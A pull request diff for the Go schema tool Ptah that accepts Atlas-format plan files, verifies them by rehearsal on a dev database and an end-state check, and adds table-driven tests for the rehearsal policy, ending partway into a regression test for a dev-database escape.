### PR TITLE
Adopt the Atlas plan-file format for compat schema plan and apply

### DIFF
--- a/cmd/atlas/schema_apply.go
+++ b/cmd/atlas/schema_apply.go
@@ -510,6 +510,16 @@ func resolveAtlasSchemaApplyPlanRehearsal(
 		return planRehearsalDecision{devURL: devURL}, nil
 	}
 	if format != atlasschema.PlanFormatHCL {
+		// A native JSON plan without a dev database is not rehearsed, so the
+		// escape lint — which only runs in front of a dev-database replay —
+		// does not see it either. That is deliberate, not an oversight: a JSON
+		// plan is Ptah-authored, its source fingerprint has already been
+		// verified against this exact database, and its statements are applied
+		// to the operator's own target, which is the one database the operator
+		// is unambiguously entitled to change. The lint exists to protect a
+		// dev database from a foreign document; neither half of that applies
+		// here. Do not "fix" this by linting the target apply: it would refuse
+		// legitimate operator-authored SQL with no security gain.
 		return planRehearsalDecision{skip: true}, nil
 	}
 	if platform.NormalizeDialect(dialect) == platform.SQLite {

--- a/cmd/atlas/schema_apply.go
+++ b/cmd/atlas/schema_apply.go
@@ -15,6 +15,8 @@ import (
 	"github.com/stokaro/ptah/cmd/internal/dbcli"
 	"github.com/stokaro/ptah/cmd/internal/editor"
 	"github.com/stokaro/ptah/config/projectconfig"
+	"github.com/stokaro/ptah/core/goschema"
+	"github.com/stokaro/ptah/core/platform"
 	"github.com/stokaro/ptah/dbschema"
 	"github.com/stokaro/ptah/internal/atlasfilter"
 	"github.com/stokaro/ptah/internal/atlasreport"
@@ -64,9 +66,18 @@ selected atlas.hcl env can provide url, schema.src, dev, exclude, schema.mode,
 format.schema.apply, and supported diff policy values. With --edit the planned
 SQL opens in $VISUAL or $EDITOR before the plan is shown and approved, and the
 edited SQL is what gets applied. With --plan file://<path>, a pre-approved
-local plan file saved by ` + "`atlas schema plan`" + ` is executed instead of
-re-planning, after verifying the database still matches the plan's source
-fingerprint; registry plan URLs are not supported. A session advisory lock
+local plan file is executed instead of re-planning; both the Atlas
+` + "`.plan.hcl`" + ` format and Ptah's native ` + "`.plan.json`" + ` format are accepted, detected
+by content. A JSON plan is verified against its recorded source fingerprint
+(a drifted target refuses as stale) and may run without --to. An Atlas-format
+plan requires --to, exactly like the official binary: its hashes are
+Atlas-computed and Ptah cannot recompute them, so the plan is verified
+semantically instead — the plan is replayed on a dev database (--dev-url, or
+an ephemeral SQLite dev database for SQLite targets) starting from the
+target's current schema, and the reached state must equal the --to desired
+state before the target is touched. After every --plan apply with a desired
+state available, the end state is verified again on the target and a mismatch
+fails loudly; registry plan URLs are not supported. A session advisory lock
 serializes concurrent applies against one target on PostgreSQL, MySQL,
 MariaDB, and SQL Server; --lock-timeout bounds how long acquisition waits
 (empty waits indefinitely), and dialects without advisory locks proceed
@@ -96,7 +107,7 @@ synced schema.`,
 	flags.StringVar(&opts.txMode, "tx-mode", "", "Transaction mode: all, file, or none")
 	registerAtlasSchemaFlag(flags, &opts.schemas, "Schemas to apply when database URLs are used")
 	flags.StringArrayVar(&opts.include, "include", nil, "Schema objects to include in apply")
-	flags.StringVar(&opts.planURL, "plan", "", "URL to a pre-planned migration (e.g., file://<name>"+atlasschema.PlanFileSuffix+")")
+	flags.StringVar(&opts.planURL, "plan", "", "URL to a pre-planned migration (e.g., file://<name>"+atlasschema.PlanFileSuffixHCL+" or file://<name>"+atlasschema.PlanFileSuffix+")")
 	flags.BoolVar(&opts.edit, "edit", false, "Open the generated SQL in an editor")
 	flags.StringVar(&opts.lockTimeout, "lock-timeout", "", "Timeout for acquiring the database lock")
 	if err := cmdflags.DisableEnvBinding(flags, "auto-approve"); err != nil {
@@ -303,10 +314,15 @@ func needsAtlasSchemaApplyConfig(cmd *cobra.Command) bool {
 	return !cmd.Flags().Changed("to") && !cmd.Flags().Changed(atlasFileFlagName)
 }
 
-// runAtlasSchemaApplyPlanFile executes a pre-approved local plan file saved by
-// `atlas schema plan` instead of re-planning. The plan's source fingerprint is
-// verified against the live database first: a drifted target refuses to
-// execute, which is the entire value of a pre-approved plan.
+// runAtlasSchemaApplyPlanFile executes a pre-approved local plan file instead
+// of re-planning. A native JSON plan is verified against its recorded source
+// fingerprint: a drifted target refuses to execute, which is the entire value
+// of a pre-approved plan. An Atlas-format `.plan.hcl` plan carries hashes
+// Ptah cannot recompute, so it is verified semantically against the required
+// --to desired state instead: the plan is rehearsed on a dev database from
+// the target's current schema and must reach exactly the desired state.
+// Whenever a desired state is available, the end state is verified again on
+// the target after the apply.
 func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOptions) error {
 	if opts.formatOutput && strings.TrimSpace(opts.format) == "" {
 		return cmdutil.Fail(cmd, fmt.Errorf("--format must not be empty"))
@@ -331,9 +347,20 @@ func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOption
 	if err != nil {
 		return cmdutil.Fail(cmd, err)
 	}
-	plan, err := atlasschema.ReadPlanFile(path)
+	plan, planFormat, err := atlasschema.ReadPlanDocument(path)
 	if err != nil {
 		return cmdutil.Fail(cmd, err)
+	}
+	// Atlas requires the desired state to verify a plan file; the Atlas plan
+	// format has nothing else to verify against, so the compat tree mirrors
+	// the official binary's contract and error for it.
+	if planFormat == atlasschema.PlanFormatHCL && len(opts.toURLs) == 0 {
+		return cmdutil.Fail(cmd, fmt.Errorf("the flag %q is required to verify the provided plan", "to"))
+	}
+	if len(opts.toURLs) > 0 {
+		if err := ensureLocalSchemaURLs("--to", opts.toURLs); err != nil {
+			return cmdutil.Fail(cmd, err)
+		}
 	}
 
 	connectCtx, cancel := dbcli.ConnectContext(cmd.Context(), dbcli.DefaultConnectTimeout)
@@ -344,7 +371,15 @@ func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOption
 	}
 	defer dbschema.CloseAndWarn(conn)
 
-	// The fingerprint verification is the serialized target inspection of the
+	var desired *goschema.Database
+	if len(opts.toURLs) > 0 {
+		desired, err = schemafile.LoadAll(opts.toURLs, schemafile.Options{Dialect: conn.Info().Dialect})
+		if err != nil {
+			return cmdutil.Fail(cmd, fmt.Errorf("load --to schema: %w", err))
+		}
+	}
+
+	// The plan verification is the serialized target inspection of the
 	// pre-approved plan path, so the lock is held before it and released on
 	// every exit path.
 	applyLock, err := atlasschema.AcquireApplyLock(cmd.Context(), conn, lockTimeout)
@@ -354,8 +389,14 @@ func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOption
 	defer releaseAtlasSchemaApplyLock(cmd, applyLock)
 	noteAtlasSchemaApplyLockUnsupported(cmd, opts.lockTimeout, applyLock, conn.Info().Dialect)
 
-	if err := atlasschema.VerifyPlanTarget(conn, plan); err != nil {
-		return cmdutil.Fail(cmd, err)
+	// A JSON plan always carries a fingerprint contract; an Atlas-format plan
+	// only when Ptah wrote it (round-trip). Foreign Atlas hashes cannot be
+	// recomputed locally, so those plans rely on the rehearsal gate alone.
+	nativeFingerprint := atlasschema.IsNativeFingerprint(plan.FromFingerprint)
+	if planFormat == atlasschema.PlanFormatJSON || nativeFingerprint {
+		if err := atlasschema.VerifyPlanTarget(conn, plan); err != nil {
+			return cmdutil.Fail(cmd, err)
+		}
 	}
 
 	statements := plan.StatementSQL()
@@ -375,6 +416,17 @@ func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOption
 	if err := validateAtlasSchemaApplyDiffPolicy(txMode, conn, statements); err != nil {
 		return cmdutil.Fail(cmd, err)
 	}
+	if err := rehearseAtlasSchemaApplyPlan(cmd, conn, opts, rehearsePlanParams{
+		format:            planFormat,
+		nativeFingerprint: nativeFingerprint,
+		statements:        statements,
+		desired:           desired,
+		exclude:           plan.Exclude,
+		txMode:            txMode,
+	}); err != nil {
+		return cmdutil.Fail(cmd, err)
+	}
+
 	ok, err := confirmAtlasSchemaApply(cmd, opts, formattedPlan)
 	if err != nil {
 		return cmdutil.Fail(cmd, err)
@@ -387,6 +439,13 @@ func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOption
 	if err := atlasschema.ApplySQL(cmd.Context(), conn, txMode, plan.SQL()); err != nil {
 		return cmdutil.Fail(cmd, fmt.Errorf("apply schema changes: %w", err))
 	}
+	// The semantic end-state verification mirrors Atlas: always on whenever a
+	// desired state is available, with no flag to disable it.
+	if desired != nil {
+		if err := atlasschema.VerifyAppliedPlanState(cmd.Context(), conn, desired, plan.Exclude); err != nil {
+			return cmdutil.Fail(cmd, err)
+		}
+	}
 	if opts.formatOutput {
 		return nil
 	}
@@ -394,9 +453,74 @@ func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOption
 	return nil
 }
 
+// rehearsePlanParams carries the plan-file rehearsal inputs derived from the
+// loaded plan document.
+type rehearsePlanParams struct {
+	format            atlasschema.PlanFormat
+	nativeFingerprint bool
+	statements        []string
+	desired           *goschema.Database
+	exclude           []string
+	txMode            migrator.MigrationTxMode
+}
+
+// rehearseAtlasSchemaApplyPlan runs the pre-apply semantic verification of a
+// plan file when it applies. Atlas-format plans are always rehearsed — for
+// foreign Atlas hashes the rehearsal is the only from-state gate, so a
+// missing dev database is an error there; a Ptah-written `.plan.hcl` with a
+// verified native fingerprint skips the rehearsal when no dev database is
+// available. JSON plans rehearse only when a dev database was requested
+// explicitly. SQLite targets never need an operator-provided dev database: an
+// ephemeral one is created on the fly.
+func rehearseAtlasSchemaApplyPlan(
+	cmd *cobra.Command,
+	conn *dbschema.DatabaseConnection,
+	opts atlasSchemaApplyOptions,
+	params rehearsePlanParams,
+) error {
+	if params.desired == nil {
+		return nil
+	}
+	devURL := strings.TrimSpace(opts.devURL)
+	if devURL == "" && params.format != atlasschema.PlanFormatHCL {
+		return nil
+	}
+	if devURL == "" {
+		switch {
+		case platform.NormalizeDialect(conn.Info().Dialect) == platform.SQLite:
+			ephemeralURL, cleanup, err := atlasschema.NewEphemeralSQLiteDev()
+			if err != nil {
+				return err
+			}
+			defer cleanup()
+			devURL = ephemeralURL
+		case params.nativeFingerprint:
+			// The verified source fingerprint plus the post-apply end-state
+			// check still hold; only the pre-apply replay is skipped.
+			return nil
+		default:
+			return fmt.Errorf(
+				"verifying an Atlas plan file requires a dev database: the plan's from/to hashes are Atlas-computed "+
+					"and Ptah cannot recompute them, so the plan is verified by replaying it on a dev database and "+
+					"comparing the reached state with --to; pass --dev-url with a %s dev database URL",
+				conn.Info().Dialect)
+		}
+	}
+	return atlasschema.RehearsePlanStatements(cmd.Context(), conn, params.statements, params.desired, atlasschema.PlanRehearsalOptions{
+		DevURL:      devURL,
+		TargetURL:   opts.url,
+		DesiredURLs: opts.toURLs,
+		Exclude:     params.exclude,
+		TxMode:      params.txMode,
+	})
+}
+
 // validateAtlasSchemaApplyPlanOptions rejects flags that would recompute or
-// reshape the pre-approved plan: the plan file already fixes the desired
-// state, the exclude patterns, and the exact SQL that was reviewed.
+// reshape the pre-approved plan: the plan file already fixes the exclude
+// patterns, the planned schema objects, and the exact SQL that was reviewed.
+// --to and --dev-url combine with --plan the way the official binary
+// combines them: --to names the desired state the plan is verified against
+// and --dev-url hosts the pre-apply rehearsal.
 func validateAtlasSchemaApplyPlanOptions(cmd *cobra.Command, opts atlasSchemaApplyOptions) error {
 	if strings.TrimSpace(opts.url) == "" {
 		return fmt.Errorf("--url is required")
@@ -405,9 +529,7 @@ func validateAtlasSchemaApplyPlanOptions(cmd *cobra.Command, opts atlasSchemaApp
 		flag   string
 		reason string
 	}{
-		{"to", "the plan file already fixes the desired state"},
-		{atlasFileFlagName, "the plan file already fixes the desired state"},
-		{"dev-url", "the plan is already computed; there is nothing to re-plan on a dev database"},
+		{atlasFileFlagName, "the plan file already fixes the desired state; name the verification desired state with --to"},
 		{"exclude", "the plan file records the exclude patterns it was computed with"},
 		{"edit", "a pre-approved plan must execute exactly as reviewed; recompute the plan with `schema plan` instead"},
 		{atlasSchemaFlagName, "the plan file already fixes the planned schema objects"},
@@ -417,6 +539,9 @@ func validateAtlasSchemaApplyPlanOptions(cmd *cobra.Command, opts atlasSchemaApp
 		if cmd.Flags().Changed(conflict.flag) {
 			return fmt.Errorf("atlas schema apply --plan cannot be combined with --%s: %s", conflict.flag, conflict.reason)
 		}
+	}
+	if cmd.Flags().Changed("dev-url") && len(opts.toURLs) == 0 {
+		return fmt.Errorf("atlas schema apply --plan with --dev-url requires --to: the rehearsal verifies the plan against the desired schema state")
 	}
 	return nil
 }

--- a/cmd/atlas/schema_apply.go
+++ b/cmd/atlas/schema_apply.go
@@ -389,17 +389,23 @@ func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOption
 	defer releaseAtlasSchemaApplyLock(cmd, applyLock)
 	noteAtlasSchemaApplyLockUnsupported(cmd, opts.lockTimeout, applyLock, conn.Info().Dialect)
 
-	// A JSON plan always carries a fingerprint contract; an Atlas-format plan
-	// only when Ptah wrote it (round-trip). Foreign Atlas hashes cannot be
-	// recomputed locally, so those plans rely on the rehearsal gate alone.
-	nativeFingerprint := atlasschema.IsNativeFingerprint(plan.FromFingerprint)
-	if planFormat == atlasschema.PlanFormatJSON || nativeFingerprint {
+	// A JSON plan always carries a fingerprint contract; a Ptah-written
+	// `.plan.hcl` carries one too (round-trip). Foreign Atlas hashes cannot be
+	// recomputed locally, so those plans rely on the rehearsal gate. The
+	// fingerprint shape is not a security boundary — the derivation is public
+	// — so it only ever adds a check, never removes one.
+	if planFormat == atlasschema.PlanFormatJSON || atlasschema.IsNativeFingerprint(plan.FromFingerprint) {
 		if err := atlasschema.VerifyPlanTarget(conn, plan); err != nil {
 			return cmdutil.Fail(cmd, err)
 		}
 	}
 
-	statements := plan.StatementSQL()
+	// One statement list is derived here and used for everything that follows
+	// — display, policy validation, rehearsal, and execution — so the list
+	// that gets verified is exactly the list that runs. Splitting with the
+	// connection dialect matters for the MySQL family, whose backslash escapes
+	// change where a string literal ends.
+	statements := atlasschema.SplitApplyStatements(plan.SQL(), conn.Info().Dialect)
 	formattedPlan := ""
 	if opts.formatOutput {
 		formattedPlan, err = renderAtlasSchemaApplyFormat(opts, statements)
@@ -410,21 +416,23 @@ func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOption
 	} else {
 		printAtlasSchemaApplyPlan(cmd.OutOrStdout(), plan.SQL())
 	}
-	if opts.dryRun {
-		return nil
-	}
 	if err := validateAtlasSchemaApplyDiffPolicy(txMode, conn, statements); err != nil {
 		return cmdutil.Fail(cmd, err)
 	}
+	// The rehearsal runs on --dry-run too: a dry run is how an operator
+	// test-drives a plan, and it would be useless if verifying a foreign plan
+	// required committing to apply it.
 	if err := rehearseAtlasSchemaApplyPlan(cmd, conn, opts, rehearsePlanParams{
-		format:            planFormat,
-		nativeFingerprint: nativeFingerprint,
-		statements:        statements,
-		desired:           desired,
-		exclude:           plan.Exclude,
-		txMode:            txMode,
+		format:     planFormat,
+		statements: statements,
+		desired:    desired,
+		exclude:    plan.Exclude,
+		txMode:     txMode,
 	}); err != nil {
 		return cmdutil.Fail(cmd, err)
+	}
+	if opts.dryRun {
+		return nil
 	}
 
 	ok, err := confirmAtlasSchemaApply(cmd, opts, formattedPlan)
@@ -436,7 +444,7 @@ func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOption
 	}
 
 	conn.SchemaWriter().SetDryRun(false)
-	if err := atlasschema.ApplySQL(cmd.Context(), conn, txMode, plan.SQL()); err != nil {
+	if err := atlasschema.ApplyStatements(cmd.Context(), conn, txMode, statements); err != nil {
 		return cmdutil.Fail(cmd, fmt.Errorf("apply schema changes: %w", err))
 	}
 	// The semantic end-state verification mirrors Atlas: always on whenever a
@@ -456,55 +464,88 @@ func runAtlasSchemaApplyPlanFile(cmd *cobra.Command, opts atlasSchemaApplyOption
 // rehearsePlanParams carries the plan-file rehearsal inputs derived from the
 // loaded plan document.
 type rehearsePlanParams struct {
-	format            atlasschema.PlanFormat
-	nativeFingerprint bool
-	statements        []string
-	desired           *goschema.Database
-	exclude           []string
-	txMode            migrator.MigrationTxMode
+	format     atlasschema.PlanFormat
+	statements []string
+	desired    *goschema.Database
+	exclude    []string
+	txMode     migrator.MigrationTxMode
+}
+
+// planRehearsalDecision is what the dev-database policy resolved to for one
+// plan apply.
+type planRehearsalDecision struct {
+	// skip reports that no rehearsal runs.
+	skip bool
+	// devURL is the dev database to rehearse on; empty with ephemeral set
+	// means the caller must create a throwaway SQLite dev database.
+	devURL string
+	// ephemeral requests a throwaway SQLite dev database.
+	ephemeral bool
+}
+
+// resolveAtlasSchemaApplyPlanRehearsal decides how a plan file gets rehearsed.
+// The plan format decides, never the fingerprint: the `sha256:` shape is
+// public and forgeable, so it must not be able to switch a verification off.
+//
+//   - An Atlas-format plan is always rehearsed. Its hashes are Atlas-computed
+//     and unverifiable locally, so the replay is the only from-state gate.
+//     SQLite targets get a throwaway dev database for free (it is just a temp
+//     file); every other dialect requires --dev-url, which every measured
+//     Atlas invocation passes anyway.
+//   - A native JSON plan already passed its fingerprint check, so it is
+//     rehearsed only when a dev database was requested explicitly.
+func resolveAtlasSchemaApplyPlanRehearsal(
+	format atlasschema.PlanFormat,
+	dialect string,
+	devURL string,
+	desired *goschema.Database,
+) (planRehearsalDecision, error) {
+	if desired == nil {
+		// Without a desired state there is nothing to verify the replay
+		// against, so there is no rehearsal to run.
+		return planRehearsalDecision{skip: true}, nil
+	}
+	devURL = strings.TrimSpace(devURL)
+	if devURL != "" {
+		return planRehearsalDecision{devURL: devURL}, nil
+	}
+	if format != atlasschema.PlanFormatHCL {
+		return planRehearsalDecision{skip: true}, nil
+	}
+	if platform.NormalizeDialect(dialect) == platform.SQLite {
+		return planRehearsalDecision{ephemeral: true}, nil
+	}
+	return planRehearsalDecision{}, fmt.Errorf(
+		"verifying an Atlas plan file requires a dev database: the plan's from/to hashes are Atlas-computed "+
+			"and Ptah cannot recompute them, so the plan is verified by replaying it on a dev database and "+
+			"comparing the reached state with --to; pass --dev-url with a %s dev database URL",
+		dialect)
 }
 
 // rehearseAtlasSchemaApplyPlan runs the pre-apply semantic verification of a
-// plan file when it applies. Atlas-format plans are always rehearsed — for
-// foreign Atlas hashes the rehearsal is the only from-state gate, so a
-// missing dev database is an error there; a Ptah-written `.plan.hcl` with a
-// verified native fingerprint skips the rehearsal when no dev database is
-// available. JSON plans rehearse only when a dev database was requested
-// explicitly. SQLite targets never need an operator-provided dev database: an
-// ephemeral one is created on the fly.
+// plan file when the policy calls for it.
 func rehearseAtlasSchemaApplyPlan(
 	cmd *cobra.Command,
 	conn *dbschema.DatabaseConnection,
 	opts atlasSchemaApplyOptions,
 	params rehearsePlanParams,
 ) error {
-	if params.desired == nil {
+	decision, err := resolveAtlasSchemaApplyPlanRehearsal(
+		params.format, conn.Info().Dialect, opts.devURL, params.desired)
+	if err != nil {
+		return err
+	}
+	if decision.skip {
 		return nil
 	}
-	devURL := strings.TrimSpace(opts.devURL)
-	if devURL == "" && params.format != atlasschema.PlanFormatHCL {
-		return nil
-	}
-	if devURL == "" {
-		switch {
-		case platform.NormalizeDialect(conn.Info().Dialect) == platform.SQLite:
-			ephemeralURL, cleanup, err := atlasschema.NewEphemeralSQLiteDev()
-			if err != nil {
-				return err
-			}
-			defer cleanup()
-			devURL = ephemeralURL
-		case params.nativeFingerprint:
-			// The verified source fingerprint plus the post-apply end-state
-			// check still hold; only the pre-apply replay is skipped.
-			return nil
-		default:
-			return fmt.Errorf(
-				"verifying an Atlas plan file requires a dev database: the plan's from/to hashes are Atlas-computed "+
-					"and Ptah cannot recompute them, so the plan is verified by replaying it on a dev database and "+
-					"comparing the reached state with --to; pass --dev-url with a %s dev database URL",
-				conn.Info().Dialect)
+	devURL := decision.devURL
+	if decision.ephemeral {
+		ephemeralURL, cleanup, err := atlasschema.NewEphemeralSQLiteDev()
+		if err != nil {
+			return err
 		}
+		defer cleanup()
+		devURL = ephemeralURL
 	}
 	return atlasschema.RehearsePlanStatements(cmd.Context(), conn, params.statements, params.desired, atlasschema.PlanRehearsalOptions{
 		DevURL:      devURL,

--- a/cmd/atlas/schema_apply_lock_test.go
+++ b/cmd/atlas/schema_apply_lock_test.go
@@ -157,7 +157,7 @@ func TestSchemaApplyDevSimulationFailureLeavesTargetUnchanged(t *testing.T) {
 
 	// The edited SQL is rehearsed exactly as it would be applied; the failed
 	// simulation refuses the apply and the target database stays unchanged.
-	c.Assert(err, qt.ErrorMatches, `(?s)dev database simulation failed during plan: .*sim_fail_users.*; the target database was left unchanged`)
+	c.Assert(err, qt.ErrorMatches, `(?s)dev database simulation failed during plan: .*sim_fail_users.*; the plan was not applied to the target database`)
 	c.Assert(out.String(), qt.Not(qt.Contains), "Schema apply completed successfully.")
 	c.Assert(sqliteTableCount(c, dbPath, "sim_fail_users"), qt.Equals, 0)
 }

--- a/cmd/atlas/schema_apply_plan_rehearsal_internal_test.go
+++ b/cmd/atlas/schema_apply_plan_rehearsal_internal_test.go
@@ -1,0 +1,166 @@
+package atlas
+
+// White-box testing required: the dev-database policy for plan rehearsal is an
+// unexported decision function whose most security-relevant branches belong to
+// dialects with no server available in CI (PostgreSQL, MySQL, and friends).
+// Driving it through the exported command would require live databases for
+// exactly the branches that most need coverage, so the decision is asserted
+// directly; the SQLite branches are additionally covered end to end.
+
+import (
+	"testing"
+
+	qt "github.com/frankban/quicktest"
+
+	"github.com/stokaro/ptah/core/goschema"
+	"github.com/stokaro/ptah/internal/atlasschema"
+)
+
+// desiredFixture is a non-nil desired schema; the decision only cares whether
+// one is present.
+func desiredFixture() *goschema.Database { return &goschema.Database{} }
+
+// desiredFor maps a table-driven presence flag onto the desired-schema
+// argument.
+func desiredFor(present bool) *goschema.Database {
+	m := map[bool]*goschema.Database{true: desiredFixture()}
+	return m[present]
+}
+
+func TestResolveAtlasSchemaApplyPlanRehearsal(t *testing.T) {
+	tests := []struct {
+		name          string
+		format        atlasschema.PlanFormat
+		dialect       string
+		devURL        string
+		hasDesired    bool
+		wantSkip      bool
+		wantEphemeral bool
+		wantDevURL    string
+	}{
+		{
+			name:       "no_desired_state_skips",
+			format:     atlasschema.PlanFormatHCL,
+			dialect:    "postgres",
+			hasDesired: false,
+			wantSkip:   true,
+		},
+		{
+			name:          "atlas_plan_on_sqlite_uses_ephemeral_dev",
+			format:        atlasschema.PlanFormatHCL,
+			dialect:       "sqlite",
+			hasDesired:    true,
+			wantEphemeral: true,
+		},
+		{
+			name:       "atlas_plan_on_postgres_with_dev_url",
+			format:     atlasschema.PlanFormatHCL,
+			dialect:    "postgres",
+			devURL:     "postgres://localhost/dev",
+			hasDesired: true,
+			wantDevURL: "postgres://localhost/dev",
+		},
+		{
+			name:       "json_plan_without_dev_url_skips",
+			format:     atlasschema.PlanFormatJSON,
+			dialect:    "postgres",
+			hasDesired: true,
+			wantSkip:   true,
+		},
+		{
+			name:       "json_plan_with_dev_url_rehearses",
+			format:     atlasschema.PlanFormatJSON,
+			dialect:    "postgres",
+			devURL:     "postgres://localhost/dev",
+			hasDesired: true,
+			wantDevURL: "postgres://localhost/dev",
+		},
+		{
+			name:       "json_plan_on_sqlite_without_dev_url_skips",
+			format:     atlasschema.PlanFormatJSON,
+			dialect:    "sqlite",
+			hasDesired: true,
+			wantSkip:   true,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+
+			decision, err := resolveAtlasSchemaApplyPlanRehearsal(tt.format, tt.dialect, tt.devURL, desiredFor(tt.hasDesired))
+
+			c.Assert(err, qt.IsNil)
+			c.Assert(decision.skip, qt.Equals, tt.wantSkip)
+			c.Assert(decision.ephemeral, qt.Equals, tt.wantEphemeral)
+			c.Assert(decision.devURL, qt.Equals, tt.wantDevURL)
+		})
+	}
+}
+
+// TestResolveAtlasSchemaApplyPlanRehearsalRequiresDevDatabase covers the
+// dialects that cannot get a throwaway dev database for free: an Atlas-format
+// plan is unverifiable without one, so it is refused rather than applied
+// unverified.
+func TestResolveAtlasSchemaApplyPlanRehearsalRequiresDevDatabase(t *testing.T) {
+	tests := []struct {
+		name    string
+		dialect string
+		devURL  string
+		wantErr string
+	}{
+		{
+			name:    "postgres",
+			dialect: "postgres",
+			wantErr: `verifying an Atlas plan file requires a dev database:.*pass --dev-url with a postgres dev database URL`,
+		},
+		{
+			name:    "mysql",
+			dialect: "mysql",
+			wantErr: `verifying an Atlas plan file requires a dev database:.*pass --dev-url with a mysql dev database URL`,
+		},
+		{
+			name:    "mariadb",
+			dialect: "mariadb",
+			wantErr: `verifying an Atlas plan file requires a dev database:.*mariadb dev database URL`,
+		},
+		{
+			name:    "postgresql_spelling",
+			dialect: "postgresql",
+			wantErr: `verifying an Atlas plan file requires a dev database:.*postgresql dev database URL`,
+		},
+		{
+			name:    "blank_dev_url_is_treated_as_absent",
+			dialect: "postgres",
+			devURL:  "   ",
+			wantErr: `verifying an Atlas plan file requires a dev database:.*`,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+
+			_, err := resolveAtlasSchemaApplyPlanRehearsal(atlasschema.PlanFormatHCL, tt.dialect, tt.devURL, desiredFixture())
+
+			c.Assert(err, qt.ErrorMatches, tt.wantErr)
+		})
+	}
+}
+
+// TestResolveAtlasSchemaApplyPlanRehearsalIgnoresFingerprintShape pins the
+// security property behind MAJOR 1: the rehearsal decision depends only on the
+// plan format, never on how the plan's fingerprints look. The `sha256:<hex>`
+// derivation is public, so a forged "Ptah-written" plan must not be able to
+// switch the verification off.
+func TestResolveAtlasSchemaApplyPlanRehearsalIgnoresFingerprintShape(t *testing.T) {
+	c := qt.New(t)
+
+	for _, dialect := range []string{"postgres", "mysql", "sqlserver", "clickhouse"} {
+		c.Run(dialect, func(c *qt.C) {
+			_, err := resolveAtlasSchemaApplyPlanRehearsal(atlasschema.PlanFormatHCL, dialect, "", desiredFixture())
+
+			c.Assert(err, qt.ErrorMatches, `verifying an Atlas plan file requires a dev database:.*`)
+		})
+	}
+}

--- a/cmd/atlas/schema_apply_plan_test.go
+++ b/cmd/atlas/schema_apply_plan_test.go
@@ -167,19 +167,14 @@ func TestSchemaApplyPlanFileRejectsCombinedPlanningFlags(t *testing.T) {
 		want string
 	}{
 		{
-			name: "to",
-			args: []string{"--to", "file://" + schemaPath},
-			want: `atlas schema apply --plan cannot be combined with --to: the plan file already fixes the desired state`,
-		},
-		{
 			name: "file",
 			args: []string{"-f", schemaPath},
-			want: `atlas schema apply --plan cannot be combined with --file: the plan file already fixes the desired state`,
+			want: `atlas schema apply --plan cannot be combined with --file: the plan file already fixes the desired state; name the verification desired state with --to`,
 		},
 		{
-			name: "dev_url",
+			name: "dev_url_without_to",
 			args: []string{"--dev-url", "sqlite://dev.db"},
-			want: `atlas schema apply --plan cannot be combined with --dev-url: the plan is already computed; there is nothing to re-plan on a dev database`,
+			want: `atlas schema apply --plan with --dev-url requires --to: the rehearsal verifies the plan against the desired schema state`,
 		},
 		{
 			name: "exclude",

--- a/cmd/atlas/schema_apply_planhcl_test.go
+++ b/cmd/atlas/schema_apply_planhcl_test.go
@@ -4,6 +4,7 @@ import (
 	"context"
 	"os"
 	"path/filepath"
+	"strings"
 	"testing"
 
 	qt "github.com/frankban/quicktest"
@@ -142,7 +143,7 @@ func TestSchemaApplyAtlasPlanFileRefusesDriftedTarget(t *testing.T) {
 	// Ptah cannot compare the plan's Atlas hashes, so the drift surfaces
 	// semantically: replaying the plan from the drifted schema does not
 	// reach --to, and the apply refuses with the target untouched.
-	c.Assert(err, qt.ErrorMatches, `(?s)pre-planned migration does not converge to the desired state:.*the target database was left unchanged.*re-run .schema plan. against the current database and review the fresh plan`)
+	c.Assert(err, qt.ErrorMatches, `(?s)pre-planned migration does not converge to the desired state:.*the plan was not applied to the target.*re-run .schema plan. against the current database and review the fresh plan`)
 	c.Assert(atlasschema.IsPlanDesiredStateFailure(err), qt.IsTrue, qt.Commentf("%s", out))
 	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
 	c.Assert(sqliteTableCount(c, dbPath, "drifted"), qt.Equals, 1)
@@ -172,6 +173,87 @@ func TestSchemaApplyAtlasPlanFileRefusesTamperedDesiredState(t *testing.T) {
 	c.Assert(err, qt.ErrorMatches, `(?s)pre-planned migration does not converge to the desired state:.*tampered_extra.*`)
 	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
 	c.Assert(sqliteTableCount(c, dbPath, "tampered_extra"), qt.Equals, 0)
+}
+
+// writeAtlasPlanFile writes a hand-built Atlas-format plan file carrying the
+// given migration body, the way a third party would hand one over.
+func writeAtlasPlanFile(c *qt.C, path, migration string) {
+	c.Helper()
+	var body strings.Builder
+	for line := range strings.SplitSeq(strings.TrimRight(migration, "\n"), "\n") {
+		body.WriteString("  " + line + "\n")
+	}
+	document := "plan \"20260801102801\" {\n" +
+		"  from      = \"2Avyplv6jw8kAsH/g2YFPkfnp+UNBpomMXPUl/4R4+Q=\"\n" +
+		"  to        = \"YEugbm2aJqmXFA8dDrzmqLPC4tiNUrXe6YCrvazKOiY=\"\n" +
+		"  migration = <<-SQL\n" + body.String() + "  SQL\n}\n"
+	c.Assert(os.WriteFile(path, []byte(document), 0o600), qt.IsNil)
+}
+
+// TestSchemaApplyAtlasPlanFileRefusesDevDatabaseEscape is the regression test
+// for the plan-verification sandbox escape: a plan whose migration attaches
+// another database file writes outside the dev database during what claims to
+// be a rehearsal, and could even pass verification because the effect lands
+// where the comparison never looks. The plan must be refused before anything
+// executes anywhere.
+func TestSchemaApplyAtlasPlanFileRefusesDevDatabaseEscape(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "escape-target.db")
